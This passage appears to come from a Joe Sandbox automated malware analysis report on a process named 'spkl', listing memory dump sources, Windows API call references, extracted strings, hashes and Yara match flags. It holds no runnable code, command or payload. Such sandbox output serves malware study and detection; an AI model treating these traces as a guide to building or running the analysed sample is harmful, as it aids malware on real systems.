                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6491b48216555f70a1019a6133b4d0416006fefd981fb9c7db9ab8d98f753c1e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9531AC7090470CABDB20DF61CC81BEFB7B9EB44700F4140BAE948B32C0D6796E908E1A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33c0000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: Genu$ineI$ntel
                                                                                                                                                                                                                                                            • API String ID: 0-3389352399
                                                                                                                                                                                                                                                            • Opcode ID: 14a87177e3acac91da4be8fa5e44951736ef3dc2eeded08482fb05f3e17207d9
                                                                                                                                                                                                                                                            • Instruction ID: f2911499458b924137ab231566ccf9f1042bb694e9f3157c33061b6595faaff8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14a87177e3acac91da4be8fa5e44951736ef3dc2eeded08482fb05f3e17207d9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20519378B242C48BCB24DF6D88D22EDFBB5AF45210F0841AEC885CF75ADA748D06CB55
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,00000001,033AD32D,00000000,033AD3DD), ref: 033A76DF
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,00000001,033AD32D,00000000,033AD3DD), ref: 033A7704
                                                                                                                                                                                                                                                              • Part of subcall function 033A7660: FileTimeToLocalFileTime.KERNEL32(?), ref: 033A768D
                                                                                                                                                                                                                                                              • Part of subcall function 033A7660: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 033A769C
                                                                                                                                                                                                                                                              • Part of subcall function 033A7714: FindClose.KERNEL32(?,?,033A7702,00000000,?,?,?,00000001,033AD32D,00000000,033AD3DD), ref: 033A7720
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 976985129-0
                                                                                                                                                                                                                                                            • Opcode ID: c757f704e8e999f22d72134eb9cd40739b29ba6115c35a804121bd37f31d335b
                                                                                                                                                                                                                                                            • Instruction ID: c62369e5e14a185357d05f3a8d538d89fef7039a0a31771c7f8299fc976e655e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c757f704e8e999f22d72134eb9cd40739b29ba6115c35a804121bd37f31d335b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20E0657AF01E20474726EEBC5CC096A91C8DA845B230E07B6F914DF355D62ACC0343E0
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?), ref: 033A78B9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1705453755-0
                                                                                                                                                                                                                                                            • Opcode ID: e4ddb7180e04cb66fb0606ffb57a85d10895d678411ace08d43d243b4ca05203
                                                                                                                                                                                                                                                            • Instruction ID: c76eb4232c67c0a16dac2c46b2b63cf0b1dddbc5565ad62b47e833a785b44bfc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4ddb7180e04cb66fb0606ffb57a85d10895d678411ace08d43d243b4ca05203
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6811DEB5E00609AFDB04CF9DC881DAFF7F9EFC9210B54C569A509EB254E6319E018BA0
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,033AB10E,00000000,033AB327,?,?,00000000,00000000), ref: 033A9CAF
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                                                            • Opcode ID: cb8b70dfe387a3e475d30475657f9d186179ff27a95f2876544dd5eff36dcb2b
                                                                                                                                                                                                                                                            • Instruction ID: 7ca1c55cc1385d4b76e6b861fbf4ec0929e33383218fa55c1625cc1d4bc29925
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb8b70dfe387a3e475d30475657f9d186179ff27a95f2876544dd5eff36dcb2b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17D05E6670DA542AE314E25E6DC4EBB5ADCCAC66A0F044039B548CB301D3008C06A3B1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b3c2c65afc760e255ced1f77604aab588006a5ed06fcc5bcfa55a88aa60d51c7
                                                                                                                                                                                                                                                            • Instruction ID: f152f9acac9ed59ac36d8767647a7ec24a01fcbe2a1169f13722ad53a2751291
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3c2c65afc760e255ced1f77604aab588006a5ed06fcc5bcfa55a88aa60d51c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 36be002e3e3cb06226a7fe1c9c93282592fe554ec477d3638c037ceacd1d5068
                                                                                                                                                                                                                                                            • Instruction ID: 27cb85cb5da548df4956f39e753a47bee97b5f661b0db865de49db42237d868e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36be002e3e3cb06226a7fe1c9c93282592fe554ec477d3638c037ceacd1d5068
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: ce52ced32c7d737f544b10359d49ee72a425d2f910487f8874029a91d7f106a2
                                                                                                                                                                                                                                                            • Instruction ID: e2674e4cd3bbaf8d2d61e7fd84a2bae8d2726de5db511d7c228c2b2c3d94011b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce52ced32c7d737f544b10359d49ee72a425d2f910487f8874029a91d7f106a2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: a1b22b7ba0064369028f0e63d927ac377447a5e75fb8166f76eebc50c81d1ffb
                                                                                                                                                                                                                                                            • Instruction ID: 2dbb1525bb222f4fd692bb2244e4e05ca9af5c843f96714471e4c807d5faaddc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1b22b7ba0064369028f0e63d927ac377447a5e75fb8166f76eebc50c81d1ffb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 8e9995640a64d533425fa7fe6bbc9858dc0a9230344ad9c15c4dcc65b9c739c4
                                                                                                                                                                                                                                                            • Instruction ID: 374f4db82d8b11a5840d797bdc68ef1f0f4341fa13fb476a3dcaa1c92a4b0adb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e9995640a64d533425fa7fe6bbc9858dc0a9230344ad9c15c4dcc65b9c739c4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: a32472e9e2b8d621fcc77b1d3ff3cca06721455f31abdc49eb50151647ab153c
                                                                                                                                                                                                                                                            • Instruction ID: 58bddd62b8dde92d4cc95a219f3a2f04bba5b47a2daab6d3aab7216094e0048c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a32472e9e2b8d621fcc77b1d3ff3cca06721455f31abdc49eb50151647ab153c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 033A51BB
                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 033A51DF
                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 033A51FB
                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 033A521C
                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 033A5245
                                                                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 033A524F
                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 033A526F
                                                                                                                                                                                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 033A5286
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 033A52A1
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(000000F5), ref: 033A52BB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1694776339-0
                                                                                                                                                                                                                                                            • Opcode ID: dc154413e751a7b10060b1bd9ec4eb835389cc2a3edff8b1944f74785f2adb2f
                                                                                                                                                                                                                                                            • Instruction ID: 5a85afc96b1e6ee07797ec1466b3e1fcec070df42ae5445984606cbe0b5bb319
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc154413e751a7b10060b1bd9ec4eb835389cc2a3edff8b1944f74785f2adb2f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D041A274904F00DAFB30DF2CCDC8B26B6E9EB03754F288A19D5D68EAD0D77998459B90
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,033AB327,?,?,00000000,00000000), ref: 033AB092
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LocaleThread
                                                                                                                                                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                                            • API String ID: 635194068-2493093252
                                                                                                                                                                                                                                                            • Opcode ID: 197b19fccf2c4e818cf7975e221f6cbb8b910ef5c21baefee5ef340954097067
                                                                                                                                                                                                                                                            • Instruction ID: d8c6a9cd9c3caad00dbbc80c33d15cbfea03d4a5e87f197e8be7f265559367f2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 197b19fccf2c4e818cf7975e221f6cbb8b910ef5c21baefee5ef340954097067
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3612B38F00B0CABDB00EBACD8C0B9EB7AADB89700F509425E115EF785DB74D94A9754
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 033A4B6B
                                                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,0000005C,kernel32.dll), ref: 033A4BCF
                                                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 033A4C04
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,0000005D,?), ref: 033A4C67
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,0000005C), ref: 033A4C85
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrcpylstrcpyn$lstrlen
                                                                                                                                                                                                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                                                            • API String ID: 2167663922-1565342463
                                                                                                                                                                                                                                                            • Opcode ID: b7f17cbc5d01684dab0291454da1363dc03ee33c89d71365ae33ac2b3dc7dd68
                                                                                                                                                                                                                                                            • Instruction ID: cd7628d37d74d8b339de1120516f49996fd65749aac73e1e8ac1a3b1c47227b7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7f17cbc5d01684dab0291454da1363dc03ee33c89d71365ae33ac2b3dc7dd68
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A415975E00A58AFDB10DAADCDC8BDEB7EDEF09200F0840E1E559DB201E6B59A458B50
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,033AB327,?,?,00000000,00000000), ref: 033AB092
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LocaleThread
                                                                                                                                                                                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                                            • API String ID: 635194068-665933166
                                                                                                                                                                                                                                                            • Opcode ID: 5a30af7cd19ff660c2c239448383b906a3f3692d8491295e30d7547504160397
                                                                                                                                                                                                                                                            • Instruction ID: abe49bef13b4b04b0a8a1a81ba9106642bed4b4221d6246f1a0a176fde020a4f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a30af7cd19ff660c2c239448383b906a3f3692d8491295e30d7547504160397
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25613C38F00B0CABDB00EBACC8C0BAEB7AADB89300F549425E115EF785DB74D9468754
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000,?,00000002,00406B96,00404443,0040448A,00010000,?), ref: 00406A29
                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000,?,00000002,00406B96,00404443,0040448A,00010000), ref: 00406A2F
                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,00406A7C,00000002,0040B8B1,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000), ref: 00406A44
                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,00406A7C,00000002,0040B8B1,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000), ref: 00406A4A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileHandleWrite
                                                                                                                                                                                                                                                            • String ID: Runtime error at 00000000
                                                                                                                                                                                                                                                            • API String ID: 3320372497-1393363852
                                                                                                                                                                                                                                                            • Opcode ID: 0c9eed1a39936270ba1f4b76f6c638a20d303835925233aef2ef59efb2a76de2
                                                                                                                                                                                                                                                            • Instruction ID: e63e786300ecc46298da8aedc39f8a4fd1395a4b7eb443298d7c7201171cb949
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c9eed1a39936270ba1f4b76f6c638a20d303835925233aef2ef59efb2a76de2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97F02B61B8030078EA10BBA05E5EF67252C6B41F28F11413FF218B92D696FC85C4CA1E
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlEnterCriticalSection.NTDLL(033E8430), ref: 033A19F5
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(033E8488,033E8430,00000000,033A1A9E), ref: 033A1A07
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(033E8448,00000000,00000000,00008000,033E8488,00000000,033A1A9E), ref: 033A1A65
                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(033E8430), ref: 033A1A8E
                                                                                                                                                                                                                                                            • RtlDeleteCriticalSection.NTDLL(033E8430), ref: 033A1A98
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$FreeLocal$DeleteEnterLeave
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3902855382-0
                                                                                                                                                                                                                                                            • Opcode ID: 74b484e1f9aae2d1fe3aef822888b0e24fab145e61ac44d09ca3bf42e76e0ca9
                                                                                                                                                                                                                                                            • Instruction ID: cc4cedd14e6042fba5662fca9d54a9b58bcda8f8bdb124920e3d1be1528cc5ba
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74b484e1f9aae2d1fe3aef822888b0e24fab145e61ac44d09ca3bf42e76e0ca9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70118C7AE48B546EE722EBACA8C4B5A77ACD749F44F480454E104EF2C5CA74E8C08B65
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,033AA14A,?,?,?,?,00000000,00000000,00000000,00000000), ref: 033A9FB6
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LocaleThread
                                                                                                                                                                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                                                                                                                                                                            • API String ID: 635194068-1253427255
                                                                                                                                                                                                                                                            • Opcode ID: 37687c23206f3e73a24468dd4b6cea65a4871b1d1bf622c4f8eae15ed14849f1
                                                                                                                                                                                                                                                            • Instruction ID: b6af6c6f495745a157f815b9c6f264e17c3d630c47de306aed5a8d3a6a2595de
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37687c23206f3e73a24468dd4b6cea65a4871b1d1bf622c4f8eae15ed14849f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5941F12EB14F096BC711EA7CCCD12BEF39EEB85210F140565E492CBB44E639DC06D661
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00406AB1
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00400000,?,00000000,?,00000002,00406B96,00404443,0040448A,00010000,?,?,?,?,0040B8B1), ref: 00406B32
                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(00869000,?,00000000,?,00000002,00406B96,00404443,0040448A,00010000,?,?,?,?,0040B8B1), ref: 00406B6E
                                                                                                                                                                                                                                                              • Part of subcall function 004069F0: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000,?,00000002,00406B96,00404443,0040448A,00010000,?), ref: 00406A29
                                                                                                                                                                                                                                                              • Part of subcall function 004069F0: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000,?,00000002,00406B96,00404443,0040448A,00010000), ref: 00406A2F
                                                                                                                                                                                                                                                              • Part of subcall function 004069F0: GetStdHandle.KERNEL32(000000F5,00406A7C,00000002,0040B8B1,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000), ref: 00406A44
                                                                                                                                                                                                                                                              • Part of subcall function 004069F0: WriteFile.KERNEL32(00000000,000000F5,00406A7C,00000002,0040B8B1,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000), ref: 00406A4A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                                                                                                                                                                            • String ID: xWA
                                                                                                                                                                                                                                                            • API String ID: 3490077880-1367497327
                                                                                                                                                                                                                                                            • Opcode ID: 43e1e9757bdaeecb3ac41fb7beedb35673f6a622efd07d19bef4bfffc1228086
                                                                                                                                                                                                                                                            • Instruction ID: 07a1f38d2ea3c9b044fb4c0f13277ba6404eb61e471d4d96d04e3d4d2f3c9cdd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43e1e9757bdaeecb3ac41fb7beedb35673f6a622efd07d19bef4bfffc1228086
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D315EB0A002609BDF21AF29848935636A4BB05324F17557BE90AF73C6D77CDCA4CB5E
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00406AB1
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00400000,?,00000000,?,00000002,00406B96,00404443,0040448A,00010000,?,?,?,?,0040B8B1), ref: 00406B32
                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(00869000,?,00000000,?,00000002,00406B96,00404443,0040448A,00010000,?,?,?,?,0040B8B1), ref: 00406B6E
                                                                                                                                                                                                                                                              • Part of subcall function 004069F0: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000,?,00000002,00406B96,00404443,0040448A,00010000,?), ref: 00406A29
                                                                                                                                                                                                                                                              • Part of subcall function 004069F0: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000,?,00000002,00406B96,00404443,0040448A,00010000), ref: 00406A2F
                                                                                                                                                                                                                                                              • Part of subcall function 004069F0: GetStdHandle.KERNEL32(000000F5,00406A7C,00000002,0040B8B1,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000), ref: 00406A44
                                                                                                                                                                                                                                                              • Part of subcall function 004069F0: WriteFile.KERNEL32(00000000,000000F5,00406A7C,00000002,0040B8B1,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0040B8B1,00000000,?,00406AA1,?,00000000), ref: 00406A4A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
